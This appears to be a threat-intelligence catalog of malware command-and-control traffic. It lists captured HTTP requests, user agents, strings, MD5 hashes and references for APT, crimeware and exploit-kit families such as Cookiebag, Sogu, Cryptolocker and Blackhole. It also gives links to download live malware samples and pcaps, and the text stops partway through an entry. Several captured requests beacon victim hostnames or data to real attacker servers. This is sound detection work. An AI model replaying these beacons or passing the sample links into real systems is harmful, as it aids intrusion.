DL Sample: http://bit.ly/crimesamples
DL pcap: http://bit.ly/crimepcaps
Analysis Date: 4/26/2013
References: http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Date: 5/1/2013 | Type: APT | Name: Comfoo / Vinself / Mspub
Pattern: GET /BmYBcnhwJxwk/VTlaMWlnYEw12511/18688/12AzAONjkCYw/UD1aND43a0xiWQ161/ HTTP/1.1
Traffic:
GET /BmYBcnhwJxwk/VTlaMWlnYEw12511/18688/12AzAONjkCYw/UD1aND43a0xiWQ161/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: en-en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)
Host: mail.lthreebox.com
Cache-Control: no-cache
Known UA: Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)
Strings: 5. Disk Information!
4. Account Information!
3. System Time!
2. CPU Type!

Unicode
RDOMAIN
RNAME
MD5s: 69bb7612b2e6a0f647b3e9c93b0bf572
DA52D94C1F5D46F5C1F73D60DA04C53C
DL Sample: http://bit.ly/aptsamples
Analysis Date: 4/7/2011
References: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_luckycat_redux.pdf
Date: 4/28/2013 | Type: APT | Name: Cookies / Cookiebag / Dalbot
Pattern: GET /1799.asp HTTP/1.1
Traffic:
GET /1799.asp HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: usnftc.org
Connection: Keep-Alive
Cookie: CAQGBgoFD1YaHA4ZH1AIBwIOBR8ADhJWWV5bX1ADBBgfBQoGDlYmKic8KjkuIz4lPy45UA==

'command=qwert;clientkey=2504;hostname=MALWAREHUNTER;'
Notes: Decoded string is shown in Figure 8, where the decoded string includes the command request, the clientkey (which is a decimal value selected at program startup), and the compromised host's name.
Known UA: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Strings: http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-2.html
http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-1.html
MD5s: 0C28AD34F90950BC784339EC9F50D288
DL pcap: http://bit.ly/aptpcaps
Analysis Date: 2012-08
References: http://intelreport.mandiant.com/
Date: 4/28/2013 | Type: APT | Name: Cookies / Cookiebag / Dalbot
Pattern:
GET /3961.html HTTP/1.1
Cookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtleT0zOTU0O2hvc3RuYW1lPXZpY3RpbTs=
Traffic:
GET /3961.html HTTP/1.1
Cookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtleT0zOTU0O2hvc3RuYW1lPXZpY3RpbTs=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
.NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022;
.NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 216.62.168.251:8080
Connection: Keep-Alive
Ports: 8080
Known UA: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
Strings: http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-2.html
http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-1.html
MD5s: 2c4cabb4ca19ddf87c7f11bad44bdf05
DL pcap: http://bit.ly/aptpcaps
Analysis Date: 2011-09
References: http://www.cyberengineeringservices.com/trojan-cookies/
Date: 4/28/2013 | Type: APT | Name: Cookies / Cookiebag / Dalbot
Pattern: GET /8223.asp HTTP/1.1 (also can be like /2007.asp, /2013.asp etc.)
Traffic:
GET /8223.asp HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 1.234.1.68
Connection: Keep-Alive
Cookie: CAQGBgoFD1YaHA4ZH1AIBwIOBR8ADhJWU1pcXlADBBgfBQoGDlYDCgUeDgcORgkIXVtcWVtQ
Known UA: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Strings: http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-2.html
http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-1.html
MD5s: 9b6692295fadf24b512d5f63e4f74d15
DL pcap: http://bit.ly/aptpcaps
Analysis Date: 2012-10
References: http://labs.alienvault.com/labs/index.php/2012/unveiling-a-spearphishing-campaign-and-possible-ramifications/
Date: 4/28/2013 | Type: APT | Name: Cookies / Cookiebag / Dalbot
Pattern: GET /indexs.zip HTTP/1.1
Traffic:
GET /indexs.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 117.55.241.58
Connection: Keep-Alive
Known UA: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Strings: http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-2.html
http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-1.html
MD5s: 840BD11343D140916F45223BA05ABACB
DL pcap: http://bit.ly/aptpcaps
Analysis Date: 2012-01
References: http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Date: 4/28/2013 | Type: APT | Name: Coswid
Pattern: GET /old/google.png HTTP/1.1
Traffic:
GET /old/google.png HTTP/1.1
Accept: . . . . . ,
User-Agent: [redacted] fcfea+Mozilla/4.0 (compatible; MSIE 8.0; win32)
Host: firstwillnessclub.com
Known UA: [redacted] fcfea+Mozilla/4.0 (compatible; MSIE 8.0; win32)
Strings: http://contagioexchange.blogspot.com/2013/08/coswid-strings-apt.html
MD5s: 726ef24b8eff4c4121c73861756fb9a3
a4ba6540520c375875bf46cf8e19cb7d
09fd067b6d944bf111857f6f60b7471e
Analysis Date: 2012-05
References: http://labs.alienvault.com/labs/index.php/category/blog/snort-blog/page/2/
Date: 10/15/2013 17:04:08 | Type: CRIME | Name: Cryptolocker
Pattern: POST /home/ HTTP/1.1
Traffic:
POST /home/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: rwyngtbvunfpk.org
Content-Length: 192
Connection: Close
Notes: crypt_1_sell23-09.exe_
Known UA: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Strings: http://contagioexchange.blogspot.com/2013/10/cryptolocker-strings-crime.html
MD5s: 9cbb128e8211a7cd00729c159815cb1c
DL Sample: http://bit.ly/crimesamples
DL pcap: http://bit.ly/crimepcaps
Analysis Date: 2013-10-14
References: http://nakedsecurity.sophos.com/2013/10/12/destructive-malware-cryptolocker-on-the-loose/
Date: 5/16/2013 | Type: Crime | Name: Cutwail / Pushdo
Pattern: POST /?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe HTTP/1.1
Traffic:
POST /?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 193
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: uakron.edu
Connection: Keep-Alive
Cache-Control: no-cache

g.P#...#...#...$..5$...$...$7S.$^.3%xQf%...%.O.%...&.Md&...&;L.&U..'o.H'...'...'...(..F(..
.2..(O..(.
........\+..p,.z...u)t.?>.-.p'+.<Z+.n.+.:.+...,.9X, ..,G7.,a.
-{.<-...-...-......:...m.>
Notes: Also can use xclzve instead of ptrxcz
Known UA: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Strings: Unicode appid\{27af75ed-20d9-11d1-b1ce-00805fc1270e}
MD5s: 582de032477e099eb1024d84c73e98c1
DL Sample: http://bit.ly/crimesamples
DL pcap: http://bit.ly/crimepcaps
Analysis Date: 2013-05
References: https://www.damballa.com/downloads/r_pubs/Damballa_mv20_case_study.pdf
Date: 4/28/2013 | Type: APT | Name: CVE-2012-0754 SWF in DOC
Pattern: GET /test.mp4 HTTP/1.1
Traffic:
GET /test.mp4 HTTP/1.1
Accept: */*
Accept-Language: en-US
x-flash-version: 11,1,102,55
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
Host: 208.115.230.76
Connection: Keep-Alive
Notes: SWF request
Known UA: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
MD5s: E92A4FC283EB2802AD6D0E24C7FCC857
Analysis Date: 2012-05
References: http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html
Date: 4/28/2013 | Type: APT | Name: CVE-2012-0779
Pattern: GET /essais.swf?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000 HTTP/1.1
Traffic:
GET /essais.swf?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000 HTTP/1.1
Accept: */*
User-Agent: contype
Host: 204.45.73.69
Known UA: contype
MD5s: 1750A38A44151493B675538A1AC2070B
Analysis Date: 2012-05
References: http://contagiodump.blogspot.com/2012/05/may-3-cve-2012-0779-world-uyghur.html
Date: 9/8/2013 21:03:58 | Type: APT | Name: Darkcomet
Pattern: GET /a.php?id=c2ViYWxpQGxpYmVyby5pdA== HTTP/1.1
Traffic:
GET /a.php?id=c2ViYWxpQGxpYmVyby5pdA== HTTP/1.1
Host: [ip.address]
Known UA: none
Strings: http://contagioexchange.blogspot.com/2013/09/dark-comet-strings-apt.html
MD5s: dc98abba995771480aecf4769a88756e
DL Sample: http://bit.ly/aptsamples
DL pcap: http://bit.ly/aptpcaps
Analysis Date: 2013-09-08
References: http://www.contextis.com/research/blog/malware-analysis-dark-comet-rat/
Date: 4/28/2013 | Type: Crime | Name: Darkmegi
Pattern: GET /20111230.jpg HTTP/1.1
Traffic:
GET /20111230.jpg HTTP/1.1
Host: images.hananren.com
User-Agent: Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+2.0.50727)
Cache-Control: no-cache
Known UA: Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+2.0.50727)
MD5s: 6C8F9658A390C24A9F4551DC15063927
Analysis Date: 2012-04
References: http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html
Date: 4/28/2013 | Type: Crime | Name: Darkness DDos v8g
Pattern: GET /index.php?uid=587609&ver=8g%20XP HTTP/1.0
Traffic:
GET /index.php?uid=587609&ver=8g%20XP HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: vkotalke.info
Pragma: no-cache
Known UA: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
MD5s: F03Bc8Dcc090607F38Ffb3A36Ccacf48
DL pcap: http://bit.ly/crimepcaps
Analysis Date: 2011-01
References: http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Date: 4/28/2013 | Type: APT | Name: Depyot
Pattern: GET /new/3d/d/pdf.php?id=2 HTTP/1.1
Traffic:
GET /new/3d/d/pdf.php?id=2 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: www.3dvideo.ru
Cache-Control: no-cache
Notes: stage 1 payload
Known UA: Mozilla/4.0 (compatible)
MD5s: 651fad35d276e5dedc56dfe7f3b5f125
Analysis Date: 2013-03
References: http://www.fireeye.com/blog/technical/targeted-attack/2013/03/internet-explorer-8-exploit-found-in-watering-hole-campaign-targeting-chinese-dissidents.html
Date: 4/28/2013 | Type: APT | Name: Destory Rat / Sogu / Thoper
Pattern: POST /update?id=3109c2a2 HTTP/1.1
Traffic:
POST /update?id=3109c2a2 HTTP/1.1
Accept: */*
X-Session: 0
X-Status: 0
X-Size: 61456
X-Sn: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;)
Host: path.alyac.org
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
Notes: Both variants are associated with the Destory RAT family of malware that dates back at least as far as January 2007.
UA: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1; | Date: 2012-02 | Ref: http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf
50
4/28/2013 | APT | Destory Rat / Sogu / Thoper | POST /update?product=windows HTTP/1.1
POST /update?product=windows HTTP/1.1
Accept: /
X-Session: 0
X-Status: 0
X-Size: 61456
X-Sn: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
Notes: Update communications. The format of Variant A is identical to the communications generated by the Destory RAT used in the SK Communications hack (http://www.commandfive.com/papers/C5_APT_SKHack.pdf).
UA: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1; | Date: 2012-02 | Ref: http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf
51
5/1/2013 | APT | Destory Rat / Sogu / Thoper | POST /update?id=000f72b8 HTTP/1.1
POST /update?id=000f72b8 HTTP/1.1
Accept: /
X-Session: 0
X-Status: 0
X-Size: 61456
X-Sn: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; SV1)
Host: localhost
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
UA: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; SV1)
Strings: GETPASSWORD1
RarSFX
Svchost.exePK
Presetup=c:\windows\
Silent=1

Unicode
Shell.Explorer
about:blank
ASKNEXTVOL
MD5: 2385B332637DD37E4E5C79A1FED46171 | Sample: http://bit.ly/aptsamples | Date: 4/18/2013 | Ref: http://www.threatexpert.com/report.aspx?md5=2385b332637dd37e4e5c79a1fed46171
52
4/28/2013 | APT | Destory Rat / Sogu / Thoper (Alienvault lists it as PlugX RAT ver NvSmartMax.dll variant but it matches Destory Rat / Sogu / Thoper; see http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf pg. 6) | POST /update?id=000f6b50 HTTP/1.1
POST /update?id=000f6b50 HTTP/1.1
Accept: /
X-Session: 0
X-Status: 0
X-Size: 61456
X-Sn: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR1.0.3705)
Host: exchange.likescandy.com
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
UA: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR | MD5: 09B8B54F78A10C435CD319070AA13C28 | Date: 2012-09 | Ref: http://labs.alienvault.com/labs/index.php/2012/the-connection-between-the-plugx-chinese-gang-and-the-latest-internet-explorer-zeroday/
53
4/28/2013 | Crime | DirtJumper DDoS | POST /678/index.php
POST /678/index.php HTTP/1.0
Host: asdaddddaaaa.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

k=426924814555748
UA: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) | Date: 2011-10 | Ref: http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
54
4/28/2013 | Crime | Dirtjumper ddos | POST /boi854tr4w.php HTTP/1.0
POST /boi854tr4w.php HTTP/1.0
Host: coppercreek.ru
Accept: /
Accept-Encoding: identity, ;q=0
Content-Length: 269
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
UA: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) | Date: 2012-08 | Ref: http://blog.shadowserver.org/page/3/
55
5/1/2013 | APT | 2Disttrack / Shamoon | GET /ajax_modal/modal/data.asp?mydata=AA==&uid=aaa.bbb.ccc.ddd&state=3067203 HTTP/1.0
GET /ajax_modal/modal/data.asp?mydata=AA==&uid=aaa.bbb.ccc.ddd&state=3067203 HTTP/1.0
User-Agent: you
UA: you | MD5s: D214C717A357FE3A455610B197C390AA, B14299FD4D1CBFB4CC7486D978398214
Sample: http://bit.ly/aptsamples | Date: 2012-08 | Ref: http://vrt-blog.snort.org/2012/08/new-threat-disttrack.html
56
4/28/2013 | Crime | DNSChanger | POST /d56sc1d56scd56sc1.php?ini=v22Mmjy0SYXyWTI0tQ0QQOdqOb68J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV750QegiBMF4XAHPzbYqRtufQpaX/M/trvO7ukg== HTTP/1.1
POST /d56sc1d56scd56sc1.php?ini=v22Mmjy0SYXyWTI0tQ0QQOdqOb68J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV750QegiBMF4XAHPzbYqRtufQpaX/M/trvO7ukg== HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: borderspot.net
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Content-Length: 193
Connection: close
Cache-Control: no-cache

data=qSrTzGL0RMCyDnY9+xJEQe5nNLundsMqfdgBGzUoJ0xVTU/DzQWC3DLbXB/UfETT1o6F2ZIbLEGVJ0MOJTSDP9PX4aSS/OagY6143bGp0y/uGVSLVL0u+uo+x5NraqI7DJaKGg7TCqXkTszGInUBxiK1/hKL2oFYpjsSeY04x+zt2a9dO+UI5VhP0W45
UA: Mozilla/6.0 (Windows; wget 3.0) | Pcap: http://bit.ly/crimepcaps | Date: 2011-12 | Ref: http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
57
4/28/2013 | APT | DNSWatch / Protux | GET /dns/dnslookup?la=en&host=picture.ucparlnet.com&type=A&submit=Resolve HTTP/1.1
2011-05
GET /dns/dnslookup?la=en&host=picture.ucparlnet.com&type=A&submit=Resolve HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0)
Host: www.dnswatch.info
Cache-Control: no-cache

2012-11
GET /dns/dnslookup?la=en&host=vcvcvcvc.dyndns.org&type=A&submit=Resolve HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0)
Host: www.dnswatch.info
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0)
Notes: The Trojan first tries to resolve its hostnames indirectly by sending the following type of request to www.dnswatch.info over TCP port 80.
UA: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0)
Strings: \Program Files\xerox\
Find fuck process.%s
it.dat
jqda///dfy
gzqu
tdfeedt.
\hon
hongzinst
~Thumbddb.tmp
OpenKeyEx Failed.%s,Error:%d
MD5s: 06ddf39bc4b5c7a8950f1e8d11c44446
2012
D4C6CD7276019CB861286ECC6B0525BE (rtf dropper)
4F8A44EF66384CCFAB737C8D7ADB4BB8
Sample: http://bit.ly/aptsamples | Pcap: http://bit.ly/aptpcaps | Date: 2011-05 | Ref: http://www.cyberengineeringservices.com/ladens-death-doc-cve-2010-3333/
http://doc.emergingthreats.net/bin/view/Main/2014359
58
4/28/2013 | APT | DNSWatch / Protux | GET /news.jpg HTTP/1.1
GET /news.jpg HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: checkerror.ucparlnet.com
Connection: Keep-Alive
Notes: The Trojan sends this type of request to checkerror.ucparlnet.com (this DNS query is done normally).
UA: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Strings: \Program Files\xerox\
Find fuck process.%s
it.dat
jqda///dfy
gzqu
tdfeedt.
\hon
hongzinst
~Thumbddb.tmp
OpenKeyEx Failed.%s,Error:%d
MD5s: 06ddf39bc4b5c7a8950f1e8d11c44446
2012
D4C6CD7276019CB861286ECC6B0525BE (rtf dropper)
4F8A44EF66384CCFAB737C8D7ADB4BB8
Sample: http://bit.ly/aptsamples | Pcap: http://bit.ly/aptpcaps | Date: 2011-05 | Ref: http://www.cyberengineeringservices.com/ladens-death-doc-cve-2010-3333/
http://doc.emergingthreats.net/bin/view/Main/2014359
59
4/28/2013 | APT | DNSWatch / Protux | POST http://ssi.ucparlnet.com:80/PHqgHumeay5705.mp3 HTTP/1.1
2011-05
POST http://ssi.ucparlnet.com:80/PHqgHumeay5705.mp3 HTTP/1.1
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Host: ssi.ucparlnet.com
Content-Length: 39
Proxy-Connection: keep-alive
Pragma: no-cache

2012-11
POST http://vcvcvcvc.dyndns.org:8080/index.pl?id=21378 HTTP/1.1
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Content-Type: multipart/form-data; boundary=----------2B9250BB47EE537B
Host: vcvcvcvc.dyndns.org
Content-Length: 272
Proxy-Connection: keep-alive
Pragma: no-cache
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Host: ssi.ucparlnet.com
Content-Length: 39
Proxy-Connection: keep-alive
Pragma: no-cache
Notes: It sent the following types of request to ssi.ucparlnet.com over TCP port 80 and picture.ucparlnet.com over TCP port 443 (NOT SSL).
UA: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Strings: \Program Files\xerox\
Find fuck process.%s
it.dat
jqda///dfy
gzqu
tdfeedt.
\hon
hongzinst
~Thumbddb.tmp
OpenKeyEx Failed.%s,Error:%d
MD5s: 06ddf39bc4b5c7a8950f1e8d11c44446
2012
D4C6CD7276019CB861286ECC6B0525BE (rtf dropper)
4F8A44EF66384CCFAB737C8D7ADB4BB8
Sample: http://bit.ly/aptsamples | Pcap: http://bit.ly/aptpcaps | Date: 2011-05 | Ref: http://www.cyberengineeringservices.com/ladens-death-doc-cve-2010-3333/
http://doc.emergingthreats.net/bin/view/Main/2014359
60
4/28/2013 | APT | Downloader BMP | GET /images/evil.bmp HTTP/1.1
GET /images/evil.bmp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0 ;Windows NT 6.1; U.S. ) 4IRh2K1I3Zl=O
Host: www.badsite4you.com
Cache-Control: no-cache
Notes: See the article: the data in red is hard-coded into the sample's binary; the data highlighted in yellow is the encoded host name (in this example: victim).
Original Encoded String - 4IRh2K1I3Zl
Decoded String - D+LJDbLR
Letters Switched - R+LJDbLD
Decoded String - victim
UA: Mozilla/4.0 (compatible; MSIE 8.0 ;Windows NT 6.1; U.S. ) | MD5: d166a59e71535a42267e9fa993ca8e7e | Date: 2012-05 | Ref: http://www.cyberengineeringservices.com/downloader-bmp/
61
4/28/2013 | APT | Einstein | GET / gttfi.php?id=019451425260376469&ext=YmFkc3R1ZmYuZGxs HTTP/1.1
GET / gttfi.php?id=019451425260376469&ext=YmFkc3R1ZmYuZGxs HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: family.mobwork.net
Connection: Keep-Alive
Cache-Control: no-cache
UA: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) | MD5: 1c2dfd36ad8cad978a0859d459f10326 | Date: 2011-08 | Ref: http://www.cyberengineeringservices.com/trojan-matryoshka-and-trojan-einstein/
62
4/28/2013 | APT | Einstein data send | POST / gttfi.php?id=019451425260376469&ext=ixioJXXJFCRrrDatKHhK HTTP/1.1
POST / gttfi.php?id=019451425260376469&ext=ixioJXXJFCRrrDatKHhK HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: family.mobwork.net
Content-Length: 420
Connection: Keep-Alive
Cache-Control: no-cache
Notes: send filename if exists | UA: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) | MD5: 1c2dfd36ad8cad978a0859d459f10326 | Date: 2011-08 | Ref: http://www.cyberengineeringservices.com/trojan-matryoshka-and-trojan-einstein/
63
4/28/2013 | Crime EK | EK - Blackhole 2 landing | GET /news/default-php-version.php?mdm=30:1g:2v:1f:1o&xguc=3b:3i:39:35&nze=1l:1f:30:1l:2v:30:1m:2v:1n:30&bhn=lixvdd HTTP/1.1
GET /news/default-php-version.php?mdm=30:1g:2v:1f:1o&xguc=3b:3i:39:35&nze=1l:1f:30:1l:2v:30:1m:2v:1n:30&bhn=lixvdd HTTP/1.1
Accept: /
Accept-Language: en-US
Referer: http://autorepairgreeley.info/news/default-php-version.php
x-flash-version: 10,1,53,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: autorepairgreeley.info
Connection: Keep-Alive
UA: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) | Pcap: http://bit.ly/crimepcaps | Date: 7/27/2013 | Ref: http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
64
4/28/2013 | Crime EK | EK Blackhole 1 | GET /showthread.php?t=d7ad916d1c0396ff HTTP/1.1
GET /showthread.php?t=d7ad916d1c0396ff HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
Host: 88.85.99.44:8080
Connection: Keep-Alive
Port: 8080 | UA: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1) | Pcap: http://bit.ly/crimepcaps | Date: 2012-03 | Ref: http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
65
4/28/2013 | Crime EK | EK Phoenix | GET /navigator/jueoaritjuir.php HTTP/1.1
GET /navigator/jueoaritjuir.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /
Accept-Language: ru
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: 78.83.233.242:8080
Connection: Keep-Alive
UA: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | Date: 2012-04 | Ref: http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
66
8/13/2013 | Crime | EK Popads | GET /?7d456d68729292e9843cb9dde2d2f7b4=34 HTTP/1.1
GET /?7d456d68729292e9843cb9dde2d2f7b4=34 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://creditforums.com/discover-card/2648-why-so-hard-get-approved-discover-card.html
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: xrp.8taglik.info
Connection: Keep-Alive
Notes: some payload | MD5s: TTF: CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot; CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2
Sample: http://bit.ly/crimesamples | Date: 2013-08 | Ref: http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/
67
8/13/2013 | Crime | EK Popads | GET /4d23ccceb2cf9e6c1c91df06170259d3/32cdad27bdec4a68d8efc9bb835008e6.swf HTTP/1.1
GET /4d23ccceb2cf9e6c1c91df06170259d3/32cdad27bdec4a68d8efc9bb835008e6.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://qkvuz.12taglik.info/?82f98f39d50070ac6bccd765eb93b37e=y15&8d97baff25493bce238a6ac40dbd2dc1=perfectboys.org
x-flash-version: 11,7,700,202
Accept-Encoding: gzip, deflate
